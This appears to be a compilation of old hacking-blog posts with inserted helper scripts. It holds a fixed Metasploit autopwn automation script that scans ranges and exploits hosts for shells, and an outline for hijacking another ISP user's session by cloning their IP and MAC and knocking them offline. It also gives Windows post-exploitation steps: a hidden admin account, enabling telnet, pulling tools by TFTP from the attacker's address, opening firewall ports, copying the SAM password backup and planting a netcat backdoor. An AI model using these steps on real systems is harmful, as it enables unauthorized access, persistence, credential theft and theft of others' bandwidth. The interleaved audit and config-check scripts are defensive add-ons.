Seems like there have been some minor changes in the Metasploit Framework 3. One of the effects is that the Autopwn Automation of Fast-Track is not working. Running the script gives the following error:

.
.
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /opt/metasploit3/msf3/plugins/db_sqlite3: Deprecated plugin
msf > db_driver sqlite3
[*] Using database driver sqlite3

One solution is to open up msfconsole and type the commands manually. But that kind of defeats the purpose of having Fast-Track installed (in a limited way of course :p ). Fortunately, the fix is very easy. All you need to do is modify the autopwn file in the /pentest/exploits/fasttrack/bin/ftsrc directory. First open the file in any text editor of your choice and look for the line containing load db_sqlite3 in this block:

try:
    child1 = pexpect.spawn('%smsfconsole' % (metapath))
    # load sqlite3
    child1.sendline('load db_sqlite3')
    # Destroy database
    child1.sendline('db_destroy pentest')
    # Create database
    child1.sendline('db_create pentest')

Now replace load db_sqlite3 on that line with db_driver sqlite3 and save the file.
Everything will work fine.

Alternatively you can copy-paste the following text into a text editor and save the file as "autopwn.py" (minus quotes) in the directory /pentest/exploits/fasttrack/bin/ftsrc . You'll need root access to replace the already existing file.

#!/usr/bin/env python
# Fast-Track autopwn automation (Python 2) with the db_sqlite3 -> db_driver fix.
# The indentation, quotes and "\n" escapes that the page formatting stripped
# are restored here; glob is added because one of the default paths contains
# a wildcard.
import pexpect, sys, os, time, glob
try:
    import psyco
    psyco.full()
except ImportError:
    pass
definepath = os.getcwd()
try:
    ipaddr = sys.argv[3]
except IndexError:
    ipaddr = raw_input("""
Metasploit Autopwn Automation

http://www.metasploit.com

This tool specifically piggy backs some commands from the Metasploit Framework and does
not modify the Metasploit Framework in anyway. This is simply to automate some tasks
from the autopwn feature already developed by the Metasploit crew.

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or 192.168.1.1/24
or whatever you want and it'll run against those hosts. Additionally you can place NMAP
commands within the autopwn ip ranges bar, for example, if you want to scan even if a
host "appears down" just do -PN 192.168.1.1-254 or whatever...you can use all NMap
syntaxes in the Autopwn IP Ranges portion.

When it has completed exploiting simply type this:

sessions -l (lists the shells spawned)
sessions -i (jumps you into the sessions)

Example 1: -PN 192.168.1.1
Example 2: 192.168.1.1-254
Example 3: -P0 -v -A 192.168.1.1
Example 4: 192.168.1.1/24

Enter the ip ranges to autopwn: """)
if ipaddr == 'quit' or ipaddr == 'q':
    print "\n\nExiting Fast-Track autopwn...\n\n"
    sys.exit()
# Spawn instance of msfconsole
try:
    option1 = sys.argv[4]
except IndexError:
    option1 = raw_input("""
Do you want to do a bind or reverse payload?

Bind = direct connection to the server
Reverse = connection originates from server

1. Bind
2. Reverse

Enter number: """)
if option1 == 'quit' or option1 == 'q':
    print "\n\nExiting Fast-Track autopwn...\n\n"
    sys.exit()
if option1 == '1': option1 = '-b'
if option1 == '2': option1 = '-r'
print "Launching MSFConsole and prepping autopwn..."
try:
    counter = 0
    # the last line of the config file holds the Metasploit path
    for line in open("%s/bin/setup/metasploitconfig.file" % (definepath)).readlines():
        metapath = line.rstrip()
    counter = 1  # path read from the config file, so Metasploit is located
except IOError:
    print "Configuration file not detected, running default path."
    print "Recommend running setup.py install to configure Fast-Track."
    print "Setting default directory..."
    counter = 0
    # BT3
    if os.path.isfile("/pentest/exploits/framework3/msfconsole"):
        metapath = "/pentest/exploits/framework3/"
        counter = 1
    # NUbuntu (the path contains a wildcard, so it has to be expanded with glob)
    for found in glob.glob("/tools/exploits/framework*/msfconsole"):
        metapath = os.path.dirname(found) + "/"
        counter = 1
# the original compared counter with the string '0', which never matched
if counter == 0:
    print "Metasploit not detected..Exiting.."
    sys.exit()

try:
    child1 = pexpect.spawn('%smsfconsole' % (metapath))
    # select the sqlite3 driver (replaces the deprecated "load db_sqlite3")
    child1.sendline('db_driver sqlite3')
    # Destroy database
    child1.sendline('db_destroy pentest')
    # Create database
    child1.sendline('db_create pentest')
    # run actual port scans
    child1.sendline('db_nmap %s' % (ipaddr))
    # run actual exploitation
    child1.sendline('db_autopwn -p -t -e %s' % (option1))
    child1.sendline('sleep 5')
    child1.sendline('jobs -K')
    child1.sendline('\n\n\n')
    child1.sendline('sessions -l')
    child1.sendline('echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i to jump into a shell"')
    # hand the console over to the user
    child1.interact()
except Exception:
    print "\nExiting Fast-Track...\n"

The level of insecurity in Sify continues to amaze me. Maybe it's just the flawed LAN kind of network design they use, maybe it's the equipment or software.. whatever.

Anyhow, I've found another way to exploit Sify networks. Well, it's not really a new exploit; attacks like this are not new. Managing a successful attack can give you free internet at the expense of some poor soul who happens to be on the same network as yours.

I'll not post complete details, only a bit of an outline. Considering the number of retarded script kiddies who are likely to use this simple exploit and misuse the bandwidth of other Sify users, I think it's a fair idea.

1st you need to run a port scan and note down all the IPs and corresponding MAC addresses in your Sify network. Any moderately good port scanner can do it for you.

2nd, choose one IP-MAC address combination of any user who is most likely logged in at that time and change your own IP and MAC address to the same.

3rd, now use something to kick that user off the network temporarily. Try to do this quickly. It's one of the most vital steps. Hints: DoS, ARP spoof :p

Open your browser and start surfing, downloading, whatever. This attack works on almost every LAN, but I expected better from a national-level ISP.

Part 1

In this post, I'll cover more things you can do to maintain access to a remote Windows XP computer. The previous post is here.


1. Creating an Invisible Account

You can create a user "admin" by running the following command:

c:\windows\system32\net user admin admin /add

But this user will be visible on the XP logon screen. To hide it, you'll have to edit a registry setting.
Open Registry Editor and navigate to this key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Here, create or modify a DWORD value by right-clicking in the right-hand pane and adding a DWORD Value. The name of the value must be the same as the account name you want to hide (admin here). Set the value data to 0 to hide the account and to 1 to show it again.

2. Enabling Telnet

Telnet is a simple utility you can use to maintain access without uploading any extra backdoor/software. The Telnet server is disabled on most PCs by default, so you'll have to set the service to start automatically and start it:

sc config telnet start= auto
net start telnet

That's it. Any service can be enabled with these commands; just replace telnet with the service of your choice.
Now you can use the account you created earlier to log in any time you want.

In this post I'll write about what to do once you gain administrative privileges on a Windows PC. There's a lot you can do, depending on your inclinations (I hope benign).
Don't ask me how to get admin rights in the first place. Figure that out yourself.
Maybe I'll write something on that someday, but not now.

Anyhow, once you get in, open a Windows command shell.
Here are a few things you might like to do:

1. Uploading/downloading files

The first thing you might do is upload a few files of your choice. TFTP (Trivial File Transfer Protocol) is an excellent choice for this.
You need to start the tftp service/daemon on your PC first and place the files you want to upload in the program's working directory. In most Linux versions, it's /tmp.

Type the following command to upload the netsh.exe file:

C:\WINDOWS>tftp -i 192.168.1.10 GET netsh.exe netsh.exe

Here:

-i specifies binary transfer mode.

GET tells the victim PC to fetch the file from the remote PC. You can use PUT to copy data onto a remote PC.

192.168.1.10 is your IP.

The first netsh.exe is the file you want to upload.

The second netsh.exe is the filename to use on the victim PC. You can change it to anything you want.

2. Editing network settings

The file netsh.exe is a Windows program for editing network-related settings of a PC. Most XP PCs don't have it by default. You'll have to upload it. In this case, it's used to open certain ports in Windows Firewall that could otherwise be blocked. VNC uses ports 5900 and 5800 for communication. You can edit the firewall settings to unblock these ports with these commands:

netsh firewall set portopening tcp 5800

netsh firewall set portopening tcp 5900

netsh.exe firewall set portopening udp 5900

This is just an example. You can use this command to block or unblock any port. Keep in mind that unblocking a particular port doesn't mean the service/program that usually uses the port will start working. For example, unblocking port 23 and trying telnet will be of no use unless the telnet service is started on that PC.
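As an added example (not from the original posts), here is a Python audit script that checks a Windows machine for the settings the posts above describe: accounts hidden via SpecialAccounts\UserList and the Telnet service start type from the previous post, and the firewall port openings written by netsh from this section. The registry paths are the standard XP ones; reading them needs Windows and the winreg module, while the parsing functions run on any platform.

```python
import sys

# Registry paths (the standard Windows XP locations, relative to HKLM).
USERLIST_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
TELNET_SERVICE_KEY = r"SYSTEM\CurrentControlSet\Services\TlntSvr"  # 'telnet' in sc/net start
OPEN_PORTS_KEY = (r"SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
                  r"\FirewallPolicy\StandardProfile\GloballyOpenPorts\List")
SERVICE_START_AUTO = 2  # Start value 2 is what 'sc config ... start= auto' writes

def read_values(subkey):
    """Return {name: data} for the values under HKLM\\subkey, {} if the key is absent."""
    import winreg  # imported here so the parsing functions below run on any OS
    out = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
            for i in range(winreg.QueryInfoKey(key)[1]):  # [1] is the value count
                name, data, _ = winreg.EnumValue(key, i)
                out[name] = data
    except OSError:
        pass  # key not present on this machine
    return out

def hidden_accounts(userlist_values):
    """Account names whose UserList DWORD is 0, i.e. hidden from the logon screen."""
    return sorted(name for name, data in userlist_values.items() if data == 0)

def parse_open_port(entry):
    """Parse a GloballyOpenPorts\\List value: 'port:proto:scope:status[:name]'."""
    parts = entry.split(":", 4)
    if len(parts) < 4:
        raise ValueError("malformed firewall entry: %r" % entry)
    return {"port": int(parts[0]), "proto": parts[1].upper(), "scope": parts[2],
            "enabled": parts[3] == "Enabled", "name": parts[4] if len(parts) > 4 else ""}

def audit():
    """Print the findings for the local machine (needs Windows and admin rights)."""
    print("hidden logon accounts:", hidden_accounts(read_values(USERLIST_KEY)) or "none")
    start = read_values(TELNET_SERVICE_KEY).get("Start")
    print("telnet (TlntSvr) start type:", "auto" if start == SERVICE_START_AUTO else start)
    for raw in read_values(OPEN_PORTS_KEY).values():
        opening = parse_open_port(raw)
        if opening["enabled"]:
            print("firewall opening: %(port)d/%(proto)s scope=%(scope)s %(name)s" % opening)

if __name__ == "__main__":
    if sys.platform == "win32":
        audit()
    else:
        print("registry audit only runs on Windows; the parsing helpers work anywhere")
```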

3. Copying SAM

The SAM file contains the list of all the users and corresponding passwords in Windows. Though its encryption can be hard to break depending on password strength, it's a very juicy target. There are quite a few paid and free tools to do that. Its default location is

C:\windows\system32\config

It's not possible to copy the SAM file directly as it's a protected system file. But there is a loophole here too. A backup copy of SAM is almost always located in

C:\windows\repair

Unlike the original SAM, you can copy this file to your own PC.

4. Uploading a back-door

A back-door program, for example netcat, is necessary if you want to keep unrestricted access. netcat is supposed to be a good program, but most anti-virus programs detect it very easily, so it's slightly out of fashion. If that's the case, you can try using script-based back-doors like Matahari. It's a perl script. The only downside is that the target PC must have perl installed, which most Windows PCs don't.
Linux fares better in this case. Another good option is VNC.

That’s enough for now. Let me know if you have any suggestions or corrections.


There are probably dozens of programs on any OS that don't have any option for using proxies. Many common command-line tools like ping and traceroute don't work if the network you are on forces you to use a proxy. I finally found a way to specify a proxy for these programs. ProxyChains is a very good tool that lets you use a proxy not only to specify a path to outside networks but also to use anonymous proxies for your privacy.

It's quite simple to install and use. First download and install the script.

Then navigate to the /etc folder and open the proxychains.conf file in any text editor of your choice. It should look like this:

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
# type host port [user pass]
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080 
#  
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here …
# meanwile
# defaults set to "tor"
http 10.123.137.1 8080
socks4 111.44.45.31 80

Now, depending on your network configuration, you'll need to add proxies to this file. If you're on a network that routes all data through a proxy server, replace the first entry under [ProxyList] (http 10.123.137.1 8080 in the example above) with the type of your proxy (http, socks4 or socks5), its IP address and its port number. Separate each field with a TAB. That'll be enough to force your programs to use your network's proxy.

But if you want to use another proxy for any purpose, including hiding your IP, you can add further proxies with their type, address and port number in the same way (the socks4 111.44.45.31 80 line above). Additionally, you may have to add a username and password if the proxy server requires them.

Notice the options #dynamic_chain, #strict_chain and #random_chain.
Removing the # sign from one of these three specifies the order in which the proxies are used. In this example I'm using the strict_chain option, though dynamic_chain will also work.

Save the file and exit the text editor. Now it's time to see it in action. Open your command line and type proxychains before the program name to force it to use your proxy list:

user~# proxychains program

As simple as that :)
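An added example (not part of the original post or of ProxyChains itself): a small Python checker that reads a proxychains.conf in the format shown above and reports the active chain mode (the file's own comment says the last uncommented one wins), whether proxy_dns is enabled, and any malformed [ProxyList] entries. The sample configuration embedded in it is constructed to mirror the file above.

```python
CHAIN_MODES = ("dynamic_chain", "strict_chain", "random_chain")
PROXY_TYPES = ("http", "socks4", "socks5")

# Constructed sample mirroring the post's file (not a real configuration).
SAMPLE_CONF = """\
#dynamic_chain
strict_chain
proxy_dns
[ProxyList]
http 10.123.137.1 8080
socks4 111.44.45.31 80
socks5 192.168.67.78 1080 lamer secret
"""

def parse_proxychains(text):
    # Returns the active chain mode, the proxy_dns flag, the parsed
    # [ProxyList] entries and a list of problems the user should fix.
    result = {"chain": None, "proxy_dns": False, "proxies": [], "problems": []}
    modes_seen, in_list = [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # '#' starts a comment
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
            continue
        if not in_list:  # directive section before [ProxyList]
            if line in CHAIN_MODES:
                modes_seen.append(line)
            elif line == "proxy_dns":
                result["proxy_dns"] = True
            continue
        fields = line.split()  # type host port [user pass], tab or blank separated
        if len(fields) not in (3, 5) or fields[0] not in PROXY_TYPES:
            result["problems"].append("line %d: expected 'type host port [user pass]' with type http, socks4 or socks5" % lineno)
        elif not (fields[2].isdigit() and 1 <= int(fields[2]) <= 65535):
            result["problems"].append("line %d: bad port %r" % (lineno, fields[2]))
        else:
            entry = {"type": fields[0], "host": fields[1], "port": int(fields[2])}
            if len(fields) == 5:
                entry["user"], entry["password"] = fields[3], fields[4]
            result["proxies"].append(entry)
    if len(modes_seen) > 1:  # per the file's own comment, the last one wins
        result["problems"].append("several chain modes uncommented; %s wins" % modes_seen[-1])
    result["chain"] = modes_seen[-1] if modes_seen else None
    if result["chain"] is None:
        result["problems"].append("no chain mode uncommented")
    if not result["proxy_dns"]:
        result["problems"].append("proxy_dns commented out: DNS lookups bypass the proxies")
    return result
```

Run it on your own file with parse_proxychains(open("/etc/proxychains.conf").read()) and fix anything listed under "problems".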